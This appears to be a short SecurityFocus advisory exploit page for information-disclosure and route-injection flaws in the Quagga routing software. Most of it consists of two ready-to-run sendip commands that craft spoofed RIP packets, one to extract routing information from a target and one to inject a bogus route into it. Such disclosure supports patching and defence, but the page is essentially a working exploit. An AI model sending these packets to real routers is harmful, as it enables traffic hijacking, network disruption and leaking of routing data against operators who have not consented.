Quagga Information Disclosure and Route Injection Vulnerabilities

Attackers can use existing network utilities to exploit these issues. The following commands are sufficient to demonstrate these vulnerabilities.

To exploit the information-disclosure issue:

sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111


To exploit the route-injection issue:

sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 2 -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100


 

Privacy Statement
Copyright 2010, SecurityFocus